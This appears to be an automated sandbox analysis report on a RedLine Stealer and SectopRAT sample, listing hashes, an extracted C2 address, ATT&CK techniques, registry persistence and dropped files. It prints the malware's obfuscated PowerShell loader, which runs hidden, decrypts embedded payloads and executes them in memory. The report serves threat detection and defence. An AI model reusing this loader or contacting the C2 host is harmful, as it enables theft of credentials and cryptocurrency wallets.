redline | 18c790568c6e0e30d600135a33a9e41ff55e076600fec006772d95849abc4def

General

Target

build.exe
Size

351KB
MD5

e00381635f0deee1380080b322aec301
SHA1

751c7ac25d1cbd1a789bea64f46bb226d9cd43e1
SHA256

18c790568c6e0e30d600135a33a9e41ff55e076600fec006772d95849abc4def
SHA512

f401016e001ffad5e731c6afb333acd3124dd8c9d2187b06cc38a4094cb2e67bfd5b8a732587df92ab34bd4902b94cdc5ab5aeb413af857777fb5e5fd13b62a3
SSDEEP

6144:Vkup0yN90QEsvxUDJchSJrcu78hp1mQlZDJ0ML:Wy900WDJLJrtKp1mGRJ0g

Score

10^/10

redline sectoprat cheat execution infostealer persistence rat spyware trojan

Malware Config

Extracted

Family

redline

Botnet

cheat

C2

ii-restored.gl.at.ply.gg:43416

Signatures

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/4868-42-0x0000000008DF0000-0x0000000008E0E000-memory.dmp	family_redline

SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
trojan rat sectoprat

SectopRAT payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/4868-42-0x0000000008DF0000-0x0000000008E0E000-memory.dmp	family_sectoprat

Blocklisted process makes network request 6 IoCs

Processes:

powershell.exe

flow pid process

3 4868 powershell.exe
5 4868 powershell.exe
7 4868 powershell.exe
8 4868 powershell.exe
9 4868 powershell.exe
11 4868 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

4868 powershell.exe
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

flow	pid	process
3	4868	powershell.exe
5	4868	powershell.exe
7	4868	powershell.exe
8	4868	powershell.exe
9	4868	powershell.exe
11	4868	powershell.exe

pid	process
4868	powershell.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

build.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	build.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exe

pid process

4868 powershell.exe
4868 powershell.exe
4868 powershell.exe
4868 powershell.exe
4868 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 4868 powershell.exe

pid	process
4868	powershell.exe
4868	powershell.exe
4868	powershell.exe
4868	powershell.exe
4868	powershell.exe

description	pid	process
Token: SeDebugPrivilege	4868	powershell.exe

Suspicious use of WriteProcessMemory 5 IoCs

Processes:

build.execmd.exe

description	pid	process	target process
PID 1900 wrote to memory of 5088	1900	build.exe	cmd.exe
PID 1900 wrote to memory of 5088	1900	build.exe	cmd.exe
PID 5088 wrote to memory of 4868	5088	cmd.exe	powershell.exe
PID 5088 wrote to memory of 4868	5088	cmd.exe	powershell.exe
PID 5088 wrote to memory of 4868	5088	cmd.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\build.exe
"C:\Users\Admin\AppData\Local\Temp\build.exe"
1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1900

C:\Windows\SYSTEM32\cmd.exe
cmd /c "build.bat"
2⤵
- Suspicious use of WriteProcessMemory
PID:5088

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('imoYPv8IKhFzZbUQGc9tLwtVTdE/LpsrhzYrOXefWdo='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('g+kpXPmwAsGMTyt1EM/xyw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $tjyzH=New-Object System.IO.MemoryStream(,$param_var); $xDXZb=New-Object System.IO.MemoryStream; $QPesd=New-Object System.IO.Compression.GZipStream($tjyzH, [IO.Compression.CompressionMode]::Decompress); $QPesd.CopyTo($xDXZb); $QPesd.Dispose(); $tjyzH.Dispose(); $xDXZb.Dispose(); $xDXZb.ToArray();}function execute_function($param_var,$param2_var){ $hVNQH=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uKjxO=$hVNQH.EntryPoint; $uKjxO.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\build.bat';$rMjrX=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\build.bat').Split([Environment]::NewLine);foreach ($NJxiO in $rMjrX) { if ($NJxiO.StartsWith(':: ')) { $kXTzm=$NJxiO.Substring(3); break; }}$payloads_var=[string[]]$kXTzm.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4868

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Defense Evasion

Modify Registry

1

T1112

Credential Access

Unsecured Credentials

1

T1552

Credentials In Files

1

T1552.001

Discovery

Lateral Movement

Collection

Data from Local System

1

T1005

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\build.bat
Filesize
276KB

MD5
717c25dae776217fbc92897c79fb72b2

SHA1
c3d1bbe2b559c0c18423b80bee499f0d23b3b477

SHA256
8c3def6d2728ca908b96df1ee12de65b03ca1e4975bbc65813154b846058b949

SHA512
4f9a1a953951cbd0cf112939d973fde0dbaff92a4a2149e619ba39998c379ff62d01c6af03005a2c03831d0d989303a7bf3c0c12ba1b3bf85d1b90ab05dd264d

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_at5kko5t.gqk.ps1
Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpF05.tmp
Filesize
46KB

MD5
02d2c46697e3714e49f46b680b9a6b83

SHA1
84f98b56d49f01e9b6b76a4e21accf64fd319140

SHA256
522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9

SHA512
60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpF1A.tmp
Filesize
92KB

MD5
55d8864e58f075cbe2dbd43a1b2908a9

SHA1
0d7129d95fa2ddb7fde828b22441dc53dffc5594

SHA256
e4e07f45a83a87aff5e7f99528464abaad495499e9e2e3e0fcd5897819f88581

SHA512
89ce123d2685448826f76dce25292b2d2d525efd8b78fd9235d1e357ad7ae2d4b3461ef903e2994cd2b8e28f56b0cc50137dd90accdd3f281472e488f6c7cf2e

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpFC3.tmp
Filesize
96KB

MD5
d367ddfda80fdcf578726bc3b0bc3e3c

SHA1
23fcd5e4e0e5e296bee7e5224a8404ecd92cf671

SHA256
0b8607fdf72f3e651a2a8b0ac7be171b4cb44909d76bb8d6c47393b8ea3d84a0

SHA512
40e9239e3f084b4b981431817ca282feb986cf49227911bf3d68845baf2ee626b564c8fabe6e13b97e6eb214da1c02ca09a62bcf5e837900160cf479c104bf77

Download Submit
memory/4868-39-0x0000000008B10000-0x0000000008B46000-memory.dmp

Filesize
216KB

Download
memory/4868-47-0x0000000008FC0000-0x0000000008FFE000-memory.dmp

Filesize
248KB

Download
memory/4868-13-0x0000000006D70000-0x0000000006DD6000-memory.dmp

Filesize
408KB

Download
memory/4868-14-0x0000000007440000-0x00000000074A6000-memory.dmp

Filesize
408KB

Download
memory/4868-15-0x0000000007620000-0x0000000007970000-memory.dmp

Filesize
3.3MB

Download
memory/4868-18-0x00000000074B0000-0x00000000074CC000-memory.dmp

Filesize
112KB

Download
memory/4868-19-0x0000000007AB0000-0x0000000007AFB000-memory.dmp

Filesize
300KB

Download
memory/4868-20-0x0000000007CD0000-0x0000000007D46000-memory.dmp

Filesize
472KB

Download
memory/4868-11-0x0000000073B20000-0x000000007420E000-memory.dmp

Filesize
6.9MB

Download
memory/4868-31-0x0000000073B20000-0x000000007420E000-memory.dmp

Filesize
6.9MB

Download
memory/4868-36-0x0000000009520000-0x0000000009B98000-memory.dmp

Filesize
6.5MB

Download
memory/4868-37-0x0000000008A90000-0x0000000008AAA000-memory.dmp

Filesize
104KB

Download
memory/4868-38-0x0000000008AD0000-0x0000000008AD8000-memory.dmp

Filesize
32KB

Download
memory/4868-9-0x0000000073B20000-0x000000007420E000-memory.dmp

Filesize
6.9MB

Download
memory/4868-42-0x0000000008DF0000-0x0000000008E0E000-memory.dmp

Filesize
120KB

Download
memory/4868-45-0x000000000A1B0000-0x000000000A7B6000-memory.dmp

Filesize
6.0MB

Download
memory/4868-46-0x0000000008F60000-0x0000000008F72000-memory.dmp

Filesize
72KB

Download
memory/4868-12-0x0000000006CD0000-0x0000000006CF2000-memory.dmp

Filesize
136KB

Download
memory/4868-48-0x0000000009140000-0x000000000924A000-memory.dmp

Filesize
1.0MB

Download
memory/4868-74-0x0000000073B2E000-0x0000000073B2F000-memory.dmp

Filesize
4KB

Download
memory/4868-75-0x0000000073B20000-0x000000007420E000-memory.dmp

Filesize
6.9MB

Download
memory/4868-84-0x0000000073B20000-0x000000007420E000-memory.dmp

Filesize
6.9MB

Download
memory/4868-99-0x0000000009D70000-0x0000000009F32000-memory.dmp

Filesize
1.8MB

Download
memory/4868-100-0x000000000ACF0000-0x000000000B21C000-memory.dmp

Filesize
5.2MB

Download
memory/4868-101-0x000000000B220000-0x000000000B71E000-memory.dmp

Filesize
5.0MB

Download
memory/4868-242-0x0000000009BA0000-0x0000000009C32000-memory.dmp

Filesize
584KB

Download
memory/4868-243-0x0000000007DF0000-0x0000000007E0E000-memory.dmp

Filesize
120KB

Download
memory/4868-244-0x0000000073B20000-0x000000007420E000-memory.dmp

Filesize
6.9MB

Download
memory/4868-251-0x0000000073B20000-0x000000007420E000-memory.dmp

Filesize
6.9MB

Download
memory/4868-10-0x0000000006E10000-0x0000000007438000-memory.dmp

Filesize
6.2MB

Download
memory/4868-8-0x00000000067A0000-0x00000000067D6000-memory.dmp

Filesize
216KB

Download
memory/4868-5-0x0000000073B2E000-0x0000000073B2F000-memory.dmp

Filesize
4KB

Download
memory/4868-440-0x0000000073B20000-0x000000007420E000-memory.dmp

Filesize
6.9MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads